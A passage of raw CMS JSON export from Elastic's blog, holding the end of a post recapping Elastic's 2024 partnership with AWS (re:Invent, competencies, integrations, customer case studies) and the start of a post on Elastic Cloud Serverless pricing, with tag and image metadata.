life.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfcd4c9c49fb8fd74"}}},{"image":{"image":{"uid":"blt168cfd5fb8efb62a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:35:04.340Z","created_by":"bltb6c155cd84fc0c1a","file_size":"664350","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-12-18T14:35:04.340Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.732Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt168cfd5fb8efb62a/6762dd983f552a0355e42471/image2.png"},"_metadata":{"uid":"csd38fe578a6d0c5ce"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa8d3d67d508f48d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVarious Elastic experts also presented 29 lightning talks across a wide variety of Elastic use cases. These short yet deep technical overviews garnered the attention of over 1,200 attendees across all industries and technical specializations.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8bfca9bcf6b91b86"}}},{"image":{"image":{"uid":"bltee77cba8c5bfd9c5","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:35:16.065Z","created_by":"bltb6c155cd84fc0c1a","file_size":"1763000","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-12-18T14:35:16.065Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.702Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltee77cba8c5bfd9c5/6762dda4f0d612e665b09e99/image4.png"},"_metadata":{"uid":"cs42f0f9266b7f320f"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Building momentum together: 2024 recap","_metadata":{"uid":"cs2280dd05dbd87d90"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur partnership momentum with AWS has continued to grow substantially throughout 2024. Below is a recap of our joint efforts over the past year to help you address your evolving use cases and derive the most value possible from Elastic on AWS.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Competencies","_metadata":{"uid":"cs84b44bfc9cccf407"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-aws-competency-financial-services\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic achieves fourth AWS Competency — this time in Financial Services\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: This distinction is given by AWS to partners with comprehensive cloud solutions that help financial sector companies realize gains in business efficiency, productivity, and innovation.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-aws-generative-ai-competency\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic part of a select group with AWS Generative AI Competency\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: This distinction is given by AWS to partners that have created cutting-edge generative AI solutions and helped customers realize significant gains in business efficiency, creativity, and productivity.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Integrations","_metadata":{"uid":"csc414cbd8e50d8c4d"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/aws-data-firehose-onboarding\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOne-Step Ingest for CloudWatch Logs and Metrics into Elastic Observability with Amazon Data Firehose\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: AWS users can use the new guided onboarding workflow to ingest CloudWatch logs and metrics in Elastic Cloud and explore the usage and performance of over 20 AWS services within minutes using the provided CloudFormation template.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.businesswire.com/news/home/20241125938547/en/Elastic-Now-Collaborates-With-AWS-to-Leverage-Generative-AI-Capabilities\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Now Collaborates With AWS to Leverage Generative AI Capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic offers LLM observability support for Amazon Bedrock in Elastic Observability.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-integrates-leading-cloud-security-vendors\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eA unified protection approach: Elastic integrates across leading cloud security vendors\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic’s integration with AWS Security Hub enhances threat detection and response for a unified approach to the complex cloud security landscape.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-automatic-import-logs-genai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccelerate log analytics in Elastic Observability with Automatic Import powered by Search AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Automatic Import currently supports Anthropic models via Elastic’s connector for Amazon Bedrock.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-aws-deliver-ai-driven-security-analytics\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic and AWS deliver on AI-driven security analytics\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Amazon Bedrock and Elastic’s Attack Discovery automate security analyst workflows.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-ai-assistant-observability-amazon-bedrock\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGetting started with the Elastic AI Assistant for Observability and Amazon Bedrock\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic version 8.13 includes the general availability of Amazon Bedrock integration for the Elastic AI Assistant for Observability.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Other announcements","_metadata":{"uid":"cs9192a01920e03d3f"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://ir.elastic.co/news/news-details/2024/Elastic-Listed-in-AWS-ICMP-for-the-US-Federal-Government/default.aspx\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Listed in AWS “ICMP” for the US Federal Government\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: The Elastic Search AI Platform is available to US government customers in ICMP.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearn how to ingest data from AWS S3 into Elastic Cloud using tutorials \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/ingest-aws-s3-data-elastic-cloud-elastic-serverless-forwarder#options-comparison\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003epart one\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/ingest-aws-s3-data-elastic-cloud-elastic-agent\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003epart two\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Customer case studies","_metadata":{"uid":"csee6c45412241f5e3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHelping our customers address challenges and realize opportunities using Elastic solutions on AWS fuels our strategic collaboration. Below are a handful of these examples in 2024.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEducation\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/georgia-state-university\"\u003e\u003cspan style='font-size: 12pt;'\u003eGeorgia State University\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFinancial Services\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/bank-leumi\"\u003e\u003cspan style='font-size: 12pt;'\u003eBank Leumi\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/discover\"\u003e\u003cspan style='font-size: 12pt;'\u003eDiscover Financial Services\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProfessional Services\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/bigid\"\u003e\u003cspan style='font-size: 12pt;'\u003eBigID\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRetail\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/hse\"\u003e\u003cspan style='font-size: 12pt;'\u003eHSE\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/waitrose\"\u003e\u003cspan style='font-size: 12pt;'\u003eWaitrose\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSoftware and Technology\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/chatleap\"\u003e\u003cspan style='font-size: 12pt;'\u003eChat Leap\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/doctolib\"\u003e\u003cspan style='font-size: 12pt;'\u003eDoctolib\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/proficio\"\u003e\u003cspan style='font-size: 12pt;'\u003eProficio\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Looking ahead ","_metadata":{"uid":"cs1e73a166b54cf9cf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOver the years, Elastic and AWS have unlocked numerous opportunities for shared success, particularly in generative AI, security, and observability. These solutions are deeply integrated with the AWS Cloud and accessible through AWS Marketplace — making it seamless for you to discover, deploy, and manage Elastic Cloud on AWS. We’re focused on the substantial value of our AWS alliance and the broad opportunities it creates for our joint customers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more exciting advancements from Elastic and AWS in 2025 as we continue to innovate and expand upon our joint successes!\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMissed attending AWS re:Invent 2024? You can still schedule time with an Elastic expert. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/contact\"\u003e\u003cspan style='font-size: 12pt;'\u003eGet in touch\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Start a free trial today","_metadata":{"uid":"cs6cc599f1d55646b8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInterested in accelerating time to insight with Elastic on AWS? Start your own \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/marketplace/pp/prodview-voru33wi6xs7k?trk=5fbc596b-6d2a-433a-8333-0bd1f28e84da%E2%89%BBchannel=el\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e7-day free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eby signing up via\u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/marketplace/pp/prodview-voru33wi6xs7k?trk=d54b31eb-671c-49ba-88bb-7a1106421dfa%E2%89%BBchannel=el\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS Marketplace\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eand quickly spin up a deployment in minutes on any of the\u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-reference-regions.html#ec_amazon_web_services_aws_regions\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud regions on AWS\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003earound the world. Your AWS Marketplace purchase of Elastic will be included in your monthly consolidated billing statement and will draw against your committed spend with AWS.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs563b38243e426d1e"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4aedda257da11108"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs500c5fe11a43e259"}}}],"publish_date":"2024-12-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"blt5b5a3dd3ee2ae4bd","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","title":"AWS","label_l10n":"AWS","keyword":"aws","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt5da20aee1a072f80","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:30.685Z","updated_at":"2023-11-06T20:08:30.685Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:00:52.463Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt736c21c9cc3bed67","ACL":{},"created_at":"2023-11-06T20:35:30.489Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-regions","label_l10n":"Cloud regions","tags":[],"title":"Cloud regions","updated_at":"2023-11-06T20:35:30.489Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.290Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cloud monitoring","label_l10n":"Cloud monitoring","keyword":"cloud-monitoring","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt4f82459203f5a666","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:35:08.968Z","updated_at":"2023-11-06T20:35:08.968Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.872Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt2448051eb5c150d4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-18T14:41:32.786Z","created_by":"bltb6c155cd84fc0c1a","file_size":"133379","filename":"168344_-_(Already_sourced)_Batch_of_5_blog_header_images_D2_3.jpg","parent_uid":null,"tags":[],"title":"168344 - (Already sourced) Batch of 5 blog header images D2_3.jpg","updated_at":"2024-12-18T14:41:32.786Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.749Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2448051eb5c150d4/6762df1cad0534d6a92c1f30/168344_-_(Already_sourced)_Batch_of_5_blog_header_images_D2_3.jpg"},"title":"Elastic and AWS in 2024: Celebrating innovation synergy at AWS re:Invent","title_l10n":"Elastic and AWS in 2024: Celebrating innovation synergy at AWS re:Invent","updated_at":"2024-12-18T14:56:23.316Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-aws-reinvent-2024","publish_details":{"time":"2024-12-18T15:58:00.601Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2fafca906f0a1e56","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"Learn more about Elastic Cloud Serverless pricing and packaging, focusing on our approach for solution-specific pricing, pricing metrics, consumption, and support.","author":["blta7580a5deddd23f5"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-05-14T20:09:13.477Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"Elastic Cloud pricing evolved","_metadata":{"uid":"csc01f0a6d1abc4b6f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud has long been the best way to use the Elastic Stack. The launch of Elastic Cloud Serverless expands Elastic Cloud with a new set of services built on the industry’s first Search AI Lake. Our pricing and packaging for Elastic Cloud Serverless was designed to be simple while offering you increased flexibility. This will make it easier for you to use, forecast, and manage your serverless deployments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscfe5f25e9745343d"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cse854f4de4ed7b5f4"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e The changes discussed here apply to our Elastic Cloud Serverless offering; our existing Self Managed and Cloud Hosted (Elasticsearch Service) offerings retain existing pricing and packaging.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"Serverless pricing and packaging objectives","_metadata":{"uid":"cs98554ea9f2be8bf3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn building the pricing and packaging for Elastic Cloud Serverless, we saw this as an opportunity to evolve our pricing approach to better fit with how you are using our solutions today and will use them in the future. In doing so, we identified the following objectives for pricing and packaging:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSimple and flexible\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e — solution-specific (Security, Observability, and Elasticsearch) pricing that is simple and easy to understand; flexibility to pay for just the Elasticsearch platform or for an Elastic solution that has Elasticsearch underpinnings\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuilt with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eestablished business metrics\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e — for ease of planning and budgeting\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalable, no required commitment\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e — works for small and large customers; easy to try new solutions and/or features\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCompetitively priced\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Solution-specific pricing and packaging","_metadata":{"uid":"cs230f912b43158957"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith serverless, we now have pricing and packaging that is distinct and designed specifically for our three solutions:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-security\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e $0.17–$0.60 per GB ingested, $0.018–$0.040 per GB/month for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/search-ai-lake-elastic-cloud-serverless\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch AI Lake\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-observability\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eObservability\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e $0.15–$0.50 per GB ingested, $0.02–$0.040 per GB/month for Search AI Lake\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElasticsearch\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e $0.14 per ingest \u003c/span\u003e\u003ca href=\"https://docs.elastic.co/serverless/elasticsearch/elasticsearch-billing\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVirtual Compute Unit 